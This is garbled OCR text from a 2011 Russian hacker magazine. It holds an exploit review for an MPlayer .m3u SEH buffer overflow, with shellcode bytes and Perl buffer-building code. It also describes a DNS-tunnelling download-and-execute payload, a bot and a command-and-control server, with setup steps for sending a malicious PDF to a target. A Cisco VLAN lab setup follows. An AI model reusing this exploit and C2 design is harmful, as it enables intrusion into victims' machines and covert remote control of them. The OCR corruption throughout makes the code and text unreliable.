порзіесі = "\х90"*0х1е5 

# ыіп32_ехес - ЕХІТРІІІ\ІС=ргосе55 СМй=са1с.ехе 5І2е=164 
ЕпсосІег=РехРп5І:епѵ5иЬ 



Соо^іс 



ккі^№п , чиі г ѵпіміи: п "=^- 



(|к#И4|ГМИЫ ы гапм-*ГТі ГУ-— — |^ІПИ ЛШШ 

Ш “дг 1 — "■ и -И Р Ч| в 




і'п ь» - щ . р I I I ■ _ ‘ I 1 1 





Вездесущий боодіе показывает 230 000 000 страниц с 
наличием сот_ѵігіиетагГ 



рауіоасі += ' \х0-р\х54\х38\х-Рб\хес\хс2\хса\х5е\х07\х7с\х69 ' 
рауіоасі += ' \хес\х1с\хба\х29\х-р0\хе5\х0с\хе6\х-Рі\х88\х61 ' 
рауіоасі += ' \хсІ0\х62\х0с\х2с\хсІ4\х7б\х0а\х02\хЫ\х0е ' 



# М1:1:р : //те1:а зріоіі: . сот 

рауіоасі = ' \x31\xс9\x83\xе9\xсIсI\xсI9\xее\xсI9\x74\x24\x■Р4 , 

рауіоасі += ' \х5Ь\х81\х73\х13\хб-р\х02\хЫ\х0е\х83\хеЬ\х-Рс ' 
рауіоасі += ' \хе2\х-Р4\х93\хеа\х-Р5\х0е\хб-Р\х02\хЗа\х4Ь\х53 ' 
рауіоасі += ' \х89\хссІ\х0Ь\х17\х03\х5е\х85\х20\х1а\хЗа\х51 ' 
рауіоасі += ' \Х4-Р\х03\х5а\х47\хе4\х36\х3а\х0-Р\х81\х33\х71 ' 
рауіоасі += ' \х97\хсЗ\х8б\х71\х7а\хб8\хсЗ\х7Ь\х03\х6е\хс0' 
рауіоасі += ' \х5а\х-Ра\х54\х56\х95\х0а\х1а\хе7\хЗа\х51\х4Ь ' 
рауіоасі += ' \х03\х5а\х68\хе4\х0е\х-Ра\х85\х30\х1е\хЬ0\хе5 ' 
рауіоасі += ' \xе4\x1е\xЗа\x0■р\x84\x8Ь\xесI\x2а\xбЬ\xс1\x80 , 
рауіоасі += ' \хсе\х0Ь\х89\хі1\хЗе\хеа\хс2\хс9\х02\хе4\х42 ' 
рауіоасі += ' \хЬсІ\х85\х1-р\х1е\х1с\х85\х07\х0а\х5а\х07\хе4' 
рауіоасі += ' \х82\х01\х0е\х6-р\х02\хЗа\х66\хБЗ\х5сІ\х80\х-Р8 1 



пеы_§і-р = ореп("рос.§і-р", "ыЬ") 
пеы_§і-р.ыгі1:е(Ье§іп_о-Р_§і-р + 
пех1:5ЕНоѵепл/гі1:е + 
5ЕНоѵегыгі1:е + 
порвіесі + 
рауіоасі + 

"\хсс"*0х1000) 



і^:(сідкі 

ѴѴіпсІоѵѵз (любая версия, включая ѴѴіпбоѵѵз 7). 
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Заплатки на данный моментнет. 
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ЕХРЮІТЗ 

реѵіе: 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 



ЕХРЮІТЗ 

реѵіе; 



Е /=» 

ЕХРЮІТЗ 



ЕХР ЮІТЗ 





ЕХРЮІТЗ 




РЕѴІЕѴѴ 



[ іеі ОмуііЗіі.нІь ]$ ріДЬоп2.7 17132. ру -1 (дііі. 



, ги: 30 ~г| / 



I ^от]а! сот^ѵігіиетагі <= ѵі 1.7 Ретоіе ВПпсІ 50І_ Ігуесііоп Ехріоіі I 
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Пример работы эксплойта под .Іоотіа! сот_ѵіі1иетагТ 




ПЕРЕПОЛНЕНИЕ БУФЕРА В 
МРІАУЕВ ШЕ 33064 (5ЕН) 



СѴ55Ѵ2 



6.9 (АѴ : Ь/АС : М/Аи : N/0 : С/І : С/А:С) 



МрІауегѴѴѴѴ — предназначенный для пользователей ОСѴѴіпсіоѵѵб 
фронтэнд к популярному мульти платформенному медиа проигрыва- 
телю тріауег, воспроизводящему большинство форматов (МРЕО/ 
ѴОВ, АѴІ, Одд/ОѲМ, ѴІѴ0, А5Р/ѴѴМ А/ѴѴМѴ, СГГ/М0Ѵ/МР4, РеаІМесІіа, 
Маігозка, КІІІТ, N и рреІѴісІео, ЕІ_І, ѴІІѴ4МРЕ6, РИМ, РоО, РѴА), под- 
держиваемых множеством встроенных, ХАпіт и ѴѴі п32 РИ кодеков. 

С помощью Мріауег можно смотреть фильмы в форматах ѴібеоСР, 
5ѴСР, РѴР, Зіѵх, РіѵХ 3/4/5, ѴѴМѴ и даже Н.264. 

Другой величайшей возможностью МРІауегявляется большое 
число поддерживаемых драйверов вывода. Он работаетсХ1 1 , Хѵ, 
йОА, ОрепОЦ 5Ѵ6АІІ6, Ыеѵ, ААІіЬ, ОігесіЕВ, ѴЕ5А (на любой ѴЕ5А- 
совместимой карте, даже безХ1 1 ) и некоторыми низкоуровневыми 
картозависимыми драйверами (для Маігох, ЗОбх и АТІ), а также ты 
можешь использовать 661, 50 1_ (и все ее драйверы). Большинство из 
них поддерживают программное или аппаратное масштабирование, 
такчтоты можешь наслаждаться видео в полноэкранном режиме. 
МРІауег поддерживает вывод через некоторые изаппаратных МРЕ6- 
декодеров, таких какЗіеплепз БѴВ, 0ХР2 и ВХРЗ/НоІІуѵѵоосІ+. 

19 марта 201 1 года господа С45510 и ЫсЬ4т опубликовали эксплойт, 
реализующий уязвимость тріауегѵѵѵѵпри парсинге тЗи-файлов. 
Рассмотрим его поближе. 




Бинго! При открытии зловредной ссылки получаем 
калькулятор 



дальнейшем управление передается на адрес, которым его переза- 
терли, и происходит выполнение стандартного для 5ЕН-эксплойтов 
кода «рор рор геі», возвращающего управление на блок Ыехі 5ЕН. 
Далее совершается прыжок вперед на пор- цеп очку (порвіеб), по 
которой мы достигаем последовательности байт«\хЕ9\х04\хЕВ\ 
хЕЕ\хЕЕ», представляющей собой прыжок назад на пор-цепочку, 
находящуюся непосредственно перед кодом полезной нагрузки. Ну 
а дальше управление получает полезная нагрузка, ограниченная 
только лишь фантазией своего создателя. Чтобы было легче осо- 
знать всю важность момента, я набросал общую схему выполнения 
эксплойта. 

Вырезка из РОС-эксплойта: 



ЕХРЮІТ 



В процессе разбора тЗи-файла, поданного на вход тріауег’у, уяз- 
вимым оказался вызов функции зігсру, копирующий пользователь- 
ский буфер, располагающийся по адресу 0хЬс8008, в стекпо адресу 
0х22еЬЬ8. В результате отсутствия каких бы то ни было проверок на 
размер копируемого буфера происходит переполнение стека. 
Уязвимое место в иде выглядит следующим образом: 

Ѳ056173Е С78424 78Ѳ4ѲѲѲѲ> МОѴ ОІлІОКО РТК 55 : [Е5Р+478] , 8О48Е0 
; А5СІІ "* . гаг" 

00561749 С78424 7С040000> МОѴ ОІлІОКО РТК 55: [Е5Р+47С] ,0 
00561754 895С24 04 МОѴ ОІлІОКО РТК 55 : [ Е5Р+4] , ЕВХ 

00561758 890424 МОѴ ОІлІОКО РТК 55: [Е5Р],ЕАХ 

0056175В Е8 А8032900 САН 007Р1В08 

; кЗМР.&тзѵсгІ: . 5І:гсру> < — 51:аск оѵегПоѵѵ 
00561760 809424 68020000 І_ЕА ЕОХ.ОІлІОКО РТК 55: [Е5Р+268] 
00561767 С74424 04 2Р000> МОѴ ОІлІОКО РТК 55 : [Е5Р+4] , 2Р 

В момент переполнения перетирается адрес 5ЕН- обработчика. В 



ту $ЬиТ = "\х90" х 100; 

$ЬиТ .= $рау1оасІ; 

$ЬиТ .= "\х41" х (5152-1еп§1:Іі($Ьи-р) ) ; 

$ЬиТ .= "\хеЬ\х0-р\хсс\хсс"; # ІМехІ: 5ЕН 

# рор рор геі: (5ЕН) используется адрес внутри секции данных 

# библиотеки аѵсосіес- 52.611., идущей в комплекте с тріауег 
И1:е 33064 

$ЬиТ .= раск( 'V , 0Х6В04РСОЕ); 

$ЬиТ .= "\х90" х 15; 

$ЬиТ .= "\хЕ9\х04\хЕВ\хРР\хРР" ; 

$ЬиТ .= "\х90" х 400; 



ТАРСЕТ5 



Мріауег Ыіе 33064 



50ШТІ0Ы 



Патча, исправляющего уязвимость в процессе парсинга тЗи-файла, 
пока что нет. -г 
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Продвинутый рауіоасі для организации туннеля 

• В позапрошлом номере я уже рассказывал про организацию 
канала обратной связи в процессе проникновения в корпоративную 
сеть, где присутствуют жесткие правила фильтрации на прокси- 
сервере, или вообще в случае, когда «пробитый» ПК не имеет доступа 
к интернету. В этой статье я расскажу про более совершенный способ 
контроля таких машин. 



Ргеѵіоизіу оп ][ 

Итак, будучи обыкновенным пентестером, мне пришлось стол- 
кнуться с задачей получения контроля над машинами, которые 
сидят за прокси-сервером, причем доступ на «левые» хосты очень 
жестко банится. В итоге был разработан шелл-код для фреймворка 
Меіазріоіі;, который выполнял прошитые команды, кодировал их 
и отправлял на мой сервер путем инкапсуляции данных в йЫБ- 
запросе на определенный домен. Даже если жертва не имела 
доступ к интернету, я получал результат выполнения моих команд, 
ведь в локальных и корпоративных сетях обычно есть РЫБ-сервер, 
который перенаправляет запросы в интернет, к владельцу (то есть 
мне). Мой ОЫБ-сервер разбирал закодированные запросы и писал 
в лог результат выполнения команд. Таким образом, я видел, что 
проникновение на такие-то и такие-то машины прошло успешно. 
Детали можешь прочитать в позапрошлом номере. 

Недостатки 

У моей наработки было несколько недостатков: 

1. Мерцание. Шелл-код выполнял как прошитую команду, так и 
отправку ОЫБ-запросов путем вызова функции _рореп. Например, 
так переправлялись данные (ба1;а_сІа1;а_сІа1;а): _рореп(“п5Іоокир 
ба1;а_сІа1;а_сІа1;а.сІотеп.ги”,’Т”). В результате на мгновения появля- 
лись консольные окошки, что, согласись, палево. 



2 . Зависимость от плбѵсігі.сНІ. Шелл-код искал все функции в 
модуле ппзѵсігі, который для большинства ПО подключен по умол- 
чанию. Если данная библиотека отсутствует, то шелл-код работать 
не будет. 

3. Отсутствие дуплексного канала связи. Шелл-код выполняет про- 
шитые команды и сообщает на сервер результат. Нет гибкости, нет 
шелла, нет возможности именно УПРАВЛЯТЬ удаленно. Только 
отчет, и все. 

4 . При одновременном срабатывании на двух разных ПК непонятно, 
откуда идут данные — все вперемешку. 

5 . Отсутствие нормального интерфейса, грязный лог-файл сервера... 
Ногу сломишь. 

Короче, штука рабочая, но неудобная, и явно ее можно улучшить. 

Модель 

Итак, что нужно пентестеру? Контроль, удобство управления, много- 
пользовательский доступ... Дело в том, что в большинстве своем 
боевая нагрузка идет в массовой рассылке и под раздачу попадает 
несколько пользователей почти одновременно. Поэтому нужно 
как-то разруливать их управление. Руководствуясь такой логикой, 
я пришел к тому, что фактически мне нужен С&С для контроля над 
ботами через ОЫБ-туннель. Так как, например, «пробитый» АсгоЬаІ 
Пеабег долго не живет, то логично, что нужно скинуть бота на диск, 
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Уникальная модель нашего проекта :) 




ОЫЗ-сервер 



Скачивание файла через йМ$ 
Запись и выполнение файла 
Управление ботом через 




Данные файла по ЭЫЗ 

а не реализовывать его в шелл-коде. Поэтому в качестве боевой 
нагрузки было решено писать «бо\л/пІоасІ&ехес»-пэйлоад. Только 
тело бота будет скачиваться не по НТТР, а по 0Ы8, что обеспечит 
нам обход всех проксей и файерволлов. Скачиваться может что 
угодно, но для моей задачи надо бы именно «бота», который управ- 
ляется так же, по ВЫ5. 

Боевая нагрузка 

Итак, начнем писать шелл-код, избавляясь от всех недостатков 
предыдущей модели. Чтобы не зависеть от модулей, будем исполь- 
зовать только кегпе132.сІІІ, который есть всегда. Шелл-код найдет 
в таблицах функций модуля два нужных адреса — І_оасИ_іЬгагу и 
ѲеіРгосАсИг. Первой функцией будем подгружать нужные модули, 
а второй — искать адреса других функций. Теперь про нужные нам 
вызовы: так как нам не хочется опять использовать _рореп (это 
заметно на целевой машине), то для запуска скаченного троянца 
будем использовать функцию ѴѴіпЕхес, в которой можно задать 
невидимость окна. Остается вопрос — как получать данные с серве- 
ра и отправлять запрос. В прошлой версии был вызов _рореп, кото- 
рый вызывал пзіоокир (опять же заметно). Использовать ѴѴіпЕхес не 
годится, а СгеаІеРгосезз — муторно. Решение — в использовании 
модуля ѴѴ52_32.сИІ и функции деіабсігіпф. Данная функция делает 
резолв доменного имени в ІР-адрес — то что нужно. И что самое 
интересное — по-прежнему не будет исходящих соединений от 
атакуемого процесса (АсгоЬаІ Реабег, например). ОЫЗ-запросы 
пойдут от БѵсЬоБІ.ехе, что позволит обойти ІІАС и файерволы. Вот 
она, сила ѴѴІ N АРІ :). Что ж, низкий уровень мы придумали, осталось 



придумать высокий уровень: как организовать процесс скачива- 
ния? Самое простое решение — разбить требуемый файл на блоки 
и поочередно передать через значения ІР-адреса. На сервере 
бинарник или любой другой файл для дропа открывается и грузится 
в ассоциированный массив массивов, при этом на каждый элемент 
массива приходится 14 считанных байт, а на каждый элемент ассо- 
циированного массива приходится 17 массивов с байтами. Индексы 
в ассоциированном массиве — четырехбайтные строки: аааа, Ьааа, 
сааа и так далее. Фактически каждый ассоциированный элемент — 
это один блок данных по 17x14 байт. Таким образом, за один 0Ы5- 
запрос передается 238 (ОхЕЕ) байт. Почему именно 1 7 и 14? Дело в 
том, что для передачи данных я решил использовать ІРѵб-протокол, 
в котором для адреса используется 16 байт, и за один запрос пере- 
дается 17 таких адресов. Оставшиеся два байта используются для 
указания сдвигов записи и размеров данных. Это означает, что 
шелл-код делает запрос с помощью деіаббгіпф (аааа.ботаіп.ги) и 
получает в ответ 1 7 ІР-адресов. Далее шелл-код парсит структуру 
полученных адресов, перебирая каждый адрес. Первый байт адреса 
указывает сдвиг данных от начала буфера, а второй байт — размер 
(всегда равно 14 байтам, кроме самого последнего адреса послед- 
него блока), остальные 14 байт — как раз данные этого блока с ука- 
занной длиной. Самое главное — первый байт. Так как ИП-адреса 
сортируются криво, то первый байт фактически указывает порядок 
этих 14 байт в полученном блоке из 17 адресов. Пример блока дан- 
ных из 29 байт «01 0203040506. .272829»: 

000е : 0102 : 0304 : 0506 : 0708 : 0910 : 1112 : 1314 

0е0е : 1516 : 1718 : 1920 : 2122 : 2324 : 2526 : 2728 

1с01 : 2900 : 0000 : 0000 : 0000 : 0000 : 0000 : 0000 

Вообще все блоки идут по 238 байт, если блок имеет меньший раз- 
мер — значит, это последний блок. Так или иначе, полученный блок 
записывается в %ТЕМР%-директорию, в файл нужного расшире- 
ния (расширение указывается при сборке шелл-кода). После этого 
шелл-код запрашивает второй блок из 238 байт (Ьааа.сіотаіп.ги) и 
дописывает его в конец того же файла. И так до тех пор, пока весь 
файл не скачается на машину «пробитого» клиента. Затем файл 
запускается с помощью ѴѴіпЕхес в невидимом режиме. Таким вот 
образом весь шелл-код и написался. Хочу заметить, что шелл-код 
тестировался в ѴѴіпсіоѵѵб 7 х64 (на 32-разрядных приложениях!) и на 
ѴѴіпсіоѵѵб ХР 5Р2 х32, где по умолчанию протокол ІРѵб не установлен. 



ХАКЕР 06 /149/ 201 1 



► 049 









взлом 




80-Т і*чіиі.' I . ік'ИілиѵІ 

^оьніт.'і' І гміііС^Т I ■! 1) і і . і иа і ’! і ІгіНііі п I 

Т 

ігпччвд] 

Гог іьлрсі Лаялт} 

II >І|н~ОГіТІіі 

СОНКІ" ЧУ Тѵ ІнЬИ-І'і! иОЯ:ИГі!і Е рСЗП I I 1? 



Управление по РЫ5 

Он не обязательно должен быть включен и активен, но установлен 
должен быть! Еще раз повторю алгоритм: 

1. Ищем кегпе132.сІ11. 

2. Ищем СеІіРгосАсІсІг . 

3. Ищем І_оасІ1іЬгагу . 

4. Грузим необходимые модули и функции - ІлІіпЕхес, 
§е1:1:асІсІгіп-Ро, ехі-Щ ■Рореп і -Рмгіііе, -Рсіозе и другие. 

5. Определяем временную директорию. 

6. Создаем там файл, сохраняем его дескриптор. 

7. Инициализируем сокет для работы с §е1:асІсІгіп-Ро. 

8. В цикле делаем запросы - аааа.сіотаіп.ги., Ьааа.сіотаіп.ги и 
так далее. 

8.1 Обрабатываем все ІР-адреса, копируя данные в стек в 
нужном порядке. 

8.2 Пишем в файл. 

9. Закрываем и запускаем файл. 

10. Выход. 

Бот 

Теперь подумаем над тем, что такое бот. В моем — пентестерском 

— случае это некий процесс, который раз в N секунд стучится на 
С&С-сервер за командой. Если команда есть — исполняет ее и 
докладывает об исполнении. Потом опять стучится за следующей. 
Так как я разрабатывал бота чисто для пентестерских целей, там 
нет иного функционала, кроме как удаленной консоли. В идеале его 
можно допиливать как угодно, хоть кейлоггер, хоть размножение и 
автозапуск, хоть еще что, но в моем случае команд всего три: 

зіеер - заснуть на пол-минуты 

ехіі: - выход 

кдругая команда> - стсі /з кдругая команда> 

После запуска бот получает имя учетной записи и домена (маши- 
ны), из-под которого он запущен. После чего отправляет запрос 
вида ХР.[пате1][пате2].сІотаіп.ги. Значение патеі — имя учет- 
ной записи пользователя, а пате2 — имя домена или компьютера. 
Эта пара является именем бота в системе. Когда сервер получит 
этот запрос, он отпишет, что зарегистрировался такой-то бот с 
таким-то именем. После чего бот будет запрашивать команды сле- 
дующим запросом: Х0.[пате1][пате2].сІотаіп.ги. Получив такой 
запрос, сервер вернет команду в виде ІР-адреса, в этот раз ІРѵ4. 
Вообще, сначала я хотел сделать так, чтобы сервер возвращал 
команду для Іхі-запросов, это было бы легче. Но был бы и минус 

— не все байты в ТХТ передаются, придется кодировать, к тому 
же такой трафик будет слишком уж палиться Ю5-системами, а в 




Два бота работают в автоматическом режиме 

ІР-адресе это в очень не явном виде, да и байты можно не коди- 
ровать. Возвращаемый формат таков: должен быть адрес 1 .1 .1 .1 

— это флаг, говорящий боту о том, что команды есть. Далее идет 
набор из ІР-адресов, где в первом октете указан номер последова- 
тельности, а в оставшихся трех — три байта команды в десятерич- 
ном виде (понятно, что длина команды ограничена 84 байтами, вот 
так-то!). Для примера смотри скриншот. Там видно, как закодиро- 
вана команда «ірсопбд». После выполнения команды наш бэкдор 
должен сообщить ответ. В этот раз я решил не мучиться с кодиро- 
ванием, так как заметил, что в 0145-запросе могут быть символы 
«+», «/» и «=», а значит можно тупо использовать Ьазе64. Поэтому 
бот докладывает на сервер так: ХХ.<І\І>.<Ьазе64>.сІотаіп.ги, где <І\І> 

— номер пакета (он нужен, чтобы потом восстановить все данные 
в один связный блок). В последнем пакете вместо <І\І> передает- 
ся флаг «ЕІ». По данному алгоритму можно написать бот с каким 
угодно функционалом, меняя лишь код бота. В моей поставке, как 
я уже говорил, есть только доступ к консоли. Сначала я писал бота 
на Си, но потом осознал главный недостаток системы — ехе-файл 
с учетом заголовка и кода будет иметь относительно большой вес, 
что увеличивает время закачки до нескольких минут. Это не годит- 
ся. Поэтому бота я написал на ѴВ5, хотя он может быть написан на 
чем угодно. Моя версия работает через вызовы пзіоокир в скрытом 
режиме. Данные парсятся регекспом с использованием временно- 
го файла. Такой бот качается за пару секунд, а функционал сохра- 
нен полностью — удаленное управление через консоль. 

Сервер 

Самая важная и навороченная часть — сервер. Я оставил в нем под- 
держку старой версии нагрузки, но также добавил и поддержку новой 
версии. Теперь интерфейс более дружелюбный и простой. При этом 
путем «блокировки» поддерживается работа с несколькими ботами. 
Каждый бот, если получил команду, блокирует сервер на время, пока 
команда не будет выполнена. Выполнив команду, сервер передает 
управление для следующего бота, а первому посылает команду зіеер. 
Таким простецким образом все боты получат кусочек времени. Команды 
задаются как в автоматическом режиме, так и в ручном. Конечно, если 
один бот не запросил команду, а потом умер, то остальные боты также 
блокируются. Поэтому введен параметр Іітеоиі, который по умолчанию 
равен десяти минутам. После чего блокировка сбрасывается. Кроме 
того, сбросить блокировку можно по <СТПІ_-С> в консоли управления. 
Сервер поддерживает как ручное управление, так и автоматическое. 
Переключение между видами управления опять же по СТПІ_-С. 

Автоматический контроль 

Для всех ботов задается одна команда по умолчанию. После ее 
исполнения клиент будет получать только команду зіеер. Чтобы 
добавить еще одну команду, нужно записать ее в файл сІпзВОТ. 
патеі ,пате2.1хІ (одной строкой), тогда при следящем запросе она 
попадет на сторону клиента и исполнится. Кроме того, можно пере- 
вести сервер в ручной режим по СТПІ_-С. 



► 050 
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Ручное управление ботом Метасплойт в действии 



Ручной контроль 

Каждый раз, когда бот запрашивает команду, открывается строка 
ввода этой команды, оператор вводит команду, команда исполня- 
ется :). 

Краткий мануал 

Теперь небольшая инструкция по эксплуатации. Задача первая: 
купить доменное имя, настроить зону на свой сервак. Поднять там 
геѵбпз.рі, чтобы отвечал на 53 порту. Настройки скрипта просты: 



$ЕСС="сІ : \\йКОР . ѴВ5" ; 
$сIе■Раи11:стсI= ,, ірсоп^^§ ,, ; 
$ООМАІМ="сІот. сот"; 

$1 РА= " 127 .0.0.1"; 



# Путь к боту для закачки 

# Команда по умолчанию 

# Твое доменное имя 

# ІР-адрес сервера РЫБ 



Запустив сервак, надо подождать, пока корневые серваки 0І\І5 
пронюхают про тебя: для этого в настройках зоны (там, где купил 
домен) укажи свои сервера в качестве владельца зоны. Для про- 
верки сделай запрос: «пзіоокир -ц=АААА аааа. бот. сот» — тебе 
должны вернуться первые 238 байт 0Н0Р.ѴВ5. После этого можно 
готовиться к пентесту, но для начала не забудь проверить домен- 
ное имя в первой строчке файла 0Р0Р.ѴВ5: 



ООМАІМ="сІот. сот" 

Если меняешь код бота, то надо перезапустить перл-скриптик, 
чтобы он подгрузил новый файл в память. После этого можно гото- 
вить эксплойт. Для начала нужно кинуть файл сІпзсІгор.гЬ в папку 
с метасплойтом, а именно с:\< М5Р>\тосІи Іез\рауІоасІ5\5І пд 1ез\ 



ѵѵіпсіоѵѵз. После этого загружай метасплойт, выбирай нужный экс- 
плойт (например для АсгоЬаІ Реабег), выбирай наш пейлоад. Его 
параметры: 

зеі: ООМАІМ=сІот. сот 
зеі: РІІ_Е=ѵЬб 

Генери РОЕ'ку с эксплойтом, шли клиенту. Когда наша торпеда 
пробьет цель, в консоли регі ты увидишь результат — запросы на 
скачивание файла. И если ничего не случилось, то после этого 
будет видно имя бота и запрос на команду. Дальнейшие действия 
зависят от режима работы — автоматическая выдача команд или 
ручная. 

Заключение 

Как ты можешь убедиться, 0І\І5 является удобным каналом удален- 
ного администрирования. Кроме того, данный РоС показывает, что 
контрольные серваки малвари также могут использовать БЫЗ для 
управления ботами в тех местах, где, казалось бы, даже нет интер- 
нета! Моя утилита, шелл-коды и прототип бота были продемонстри- 
рованы на конференции СОЫЕібепсе 201 1 в Кракове и доступны 
для скачивания на сайте ОЗесРО. Ну и, конечно же, все исходные 
коды присутствуют на диске ][! 

Удачных тебе пентестов, и помни, что использование этой утилиты 
без ведома человека (на ПК которого применяется шеллкод/БОТ) 
или его законного представителя карается по всей строгости УК 
РФ! 

Р.5. Чтобы быть совсем вредным и не распространять троянское 
ПО, функционал консоли в коде бота я заменил заглушкой, т 
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с домашней 
киской 



Мучаем дома виртуальную сеть на базе Сізсо 
и не только 

• Так ли безопасны сети провайдеров и крупных компаний, 



использующих технологии ѴРМ для 
сетей сегодня? Давай проверим. 

Заводим киску 

Одна и та же задача создания виртуальных соединений и сетей 
(ѴРІ\І) может быть решена как минимум двумя принципиально 
разными способами. Первый предполагает создание виртуальных 
каналов (тоннелей) поверх транспортного протокола, обычно на 
базе ІР или ЕШегпеР Узел-клиент, используя свои учетные данные, 
устанавливает соединение «точка-точка» с сервером доступа, и уже 
через этот вновь образованный канал осуществляет прием и пере- 
дачу данных. При этом как процедура авторизации, так и информа- 
ционный обмен может быть зашифрован как весь, так и частично 
(только заголовок и пароль авторизации). Второй способ строится 



организации своих внутренних 



на базе коммутируемого Еібегпеі с использованием виртуальных 
сетей ѴІ_АІ\І. Разделение сетей на виртуальные происходит на уров- 
не коммутатора, который имеет возможность выделять на каналь- 
ном уровне одного или нескольких пользователей в группу по неко- 
торым признакам, которыми могут быть порт или МАС-адрес. 
Именно с ѴІ_АЫ мы и будем сегодня экспериментировать. 

Основной инструмент, который нам понадобится — это Оупатірз, 
позволяющий эмулировать маршрутизаторы Сізсо на обычной 
машине под управлением ОС ѴѴіпсІоѵѵз. С его помощью нам будут 
доступны все команды реального Сізсо 105 (поскольку именно его 
мы и будем использовать). 
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Команда «ісііерс де* гоиіегпате» 

Для Оупатірз существует как минимум два облегчаю- 
щих работу фронтэнд-интерфейса: Оупадеп и 0ІЧ53 
(графическая версия Оупатірз). Я остановился на 
Оупадеп ( сіѵпадеп.ога ). После его установки на рабочем 
столе появятся четыре ярлыка: 

• Оупадеп Затріе І_аЬз — примеры конфигурации 

УСТРОЙСТВ СІЗСО ; 

• Оупатірз Зегѵег — непосредственно сам сервер; 

• ІЧеІѵѵогк беѵісе Іізі - средство просмотра списка сете- 
вых устройств, присутствующих физически в нашей 
системе (он понадобится нам чуть позже, при подключе- 
нии моделируемого маршрутизатора к реальной сети); 

• Реппи Зегѵег - эмулятор устройств Сізсо РІХ. 

Для эмуляции работы виртуальной частной сети нам 
понадобится образ программного обеспечения реально- 
го маршрутизатора. Образ базовой Сізсо 105 7200, под 
которую и писался Оупатірг, очень тяжелый, долго гру- 
зится и вообще нестабильно себя ведет на моем стенде. 
Поэтому лучше использовать более легкий, например 
с3745-асМрзеплсезк9-пп2.1 24-1 б.Тб.Ьіп. В принципе 
Оупадеп будет нормально работать и со сжатым файлом, 
каковым является любой образ Сізсо 105, однако деком- 
прессия увеличит время загрузки, поэтому неплохо бы 
его сначала распаковать при помощи 1т или гаг, но это 
не обязательно. 



>им виртуальный 
Ѵцентр 

Оупадеп использует файлы с расширением *.пеІ, в 
которых содержится информация о конфигурации марш- 
рутизаторов, коммутаторов и соединений между ними. 
Мы не будем редактировать сэмплы, а напишем свой 
конфиг С нуля: 

# Зітріе Сізсо 3745 ыіііі 2 геаі іпіег-Расез 

аиіозіагі: = Раізе 

[Іосаіііозі:] 

[[3745]] 

іта§е = \Рпо§гат Рі1е5\0упатірз\іта§ез\ 
с3745-асІѵір5егѵісе5к9-т2. 124- 15. Тб. Ьіп 
ісііерс = 0Х613-Р0764 
пре = пре-300 
гат = 160 

[ [КОШЕК К1]] 
сопзоіе = 2000 
тосіеі = 3745 

сп-р§ = соп6§з\сізсо_3745.с-р§ 

31011 = ІММ-16Е5ІЛІ 

31012 = РА-2РЕ-ТХ 

Р1/0 = І\ІІО_§еп_е1:І'і:\Оеѵісе\ 
І\ІРР_{7С94С2ОР-С005-489О-9Е50-3199АЕРЕ6Р27} 

Р2/1 = І\ІІО_§еп_е1:І'і:\Оеѵісе\ 
І\ІРР_{3209ЕААВ-22СО-453А-965А-О02490ОВ7ЕОЕ} 



вых устройств 

Разобраться, что к чему, не так уж и сложно. 

• [Іосаібозі] — хост, на котором запущен Оупатірз. 

• [[3745]] — это обозначение подсекции, поэтому скобки 
двойные. В данном случае это подсекция [Іосаібозі]. 

Все, что описывается здесь, относится только к 
Іосаібозі. Эта секция описывает все значения по умол- 
чанию, относящиеся ко всем маршрутизаторам серии 
Сізсо 3745, которые мы можем моделировать. 

• ітаде — указывает расположение образа Сізсо 105 
с3745-асМрзеплсезк9-пп2.1 24-1 5. Тб. Ьіп. Достаточно 
немного погуглить, чтобы найти именно его или любой 
другой образ. 

• пре = пре-300 — каждый наш маршрутизатор серии 
3745 будет использовать ІЧеІѵѵогк Ргосеззіпд Епдіпе 300. 

• гат = 160 — каждый моделируемый маршрутизатор 
будет использовать 160 Мб оперативной памяти. Само 
собой, объем необходимой памяти зависит от образа, 
который мы используем, и количества используемых 
сервисов, поэтому здесь можно руководствоваться 
принципом «чем больше, тем лучше» и ставить от 256 
Мб. 

• ісііерс = 0x6 1 3і07Ь4 - опция, которая указывает время 
задержки процессора. 

После запуска приложения нагрузка на процессор воз- 
растает до 100%. Чтобы избежать этого, нужно сделать 
следующее. Подключись к своему маршрутизатору через 
Іеіпеі и удостоверься, что ты в епаЫе-режиме, то есть 
стадия загрузки прошла. Затем вернись к приложению 
Оупадеп и набери команду «ісііерс деі гоиіегпате» (в 
нашем случае — «ісііерс деі Р1»), 

Ты увидишь список из десяти значений, лучшие из 
которых будут отмечены звездочкой. Выбери одно из 
них и нажми <Еп1ег>. После этого нагрузка на СРІІ 
должна упасть. Если этого не произошло — нужно 
выбрать другое значение. Для этого набери «ісііерс збоѵѵ 
гоиіегпате» (в нашем случае - «ісііерс збоѵѵ РЪ>). Будут 
выведены значения, вычисленные ранее, и ты сможешь 
выбрать какое-либо другое. После того, как найдешь 
наилучшее значение, просто подставь его в наш файл 
конфигурации. 

• [[РОІІТЕР Р1]] — подсекция, описывающая непосред- 
ственно маршрутизатор. Р1 — это просто имя, исполь- 
зуемое Оупатірз, оно не имеет отношения к Ьозіпате в 
конфигурации. 

• зіоіі = ІЧМ-16Е5ѴѴ — в слот 1 мы добавили карту 
ЫМ-16Е5ѴѴ (ЕазіЕібегпеІ с 16 портами], и именно на ней 
будем в дальнейшем ставить эксперименты с безопас- 
ностью. 

• ЗІОІ2 = РА-2ЕЕ-ТХ — в слот 2 мы добавили карту 
РА-2ЕЕ-ТХ (ЕазіЕібегпеІ с 2 портами). Этот порт на 
самом деле нам не очень важен, хотя его можно задей- 
ствовать в нашей конфигурации устройства — к приме- 
ру, получать через него реальный выход в интернет. 

• спід = сопІідз\сізсо_3745.сІд - собственно, сам файл 




> іпіо 



• Оупатірз позволяет 
полностью эмулиро- 
вать только маршру- 
тизаторы и устройства 
РІХ (Ргіѵаіе Іпіегпеі 
ЕхсЬапде]. Можно 
соединить марш- 
рутизаторы через 
коммутаторы, однако 
на них можно будет 
указать лишь ѴІ_АІ\І Ю 
или Ігипк. 

• Вообще в пакете 
Меіазріоіі есть два 
модуля для работы с 
5ТР - это зрооі/сізсо/ 
зір и зрооі/сізсо/ 
рѵзір. Один - тупо для 
работы в единствен- 
ном ѴІ_АІ\Ге, второй - 
устраивает «выборы» 
для всех ѴІ_АІ\Гов, ко- 
торые есть в наличии, 
ну и соответственно 
выигрывает их. 
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Модули для работы с коммутаторами 
из пакета Меіазріой Ргатеѵѵогк 

конфигурации маршрутизатора, ты можешь включить в него все 
что заблагорассудится, но такие тяжёлые штуки как ВОР (Вогсіег 
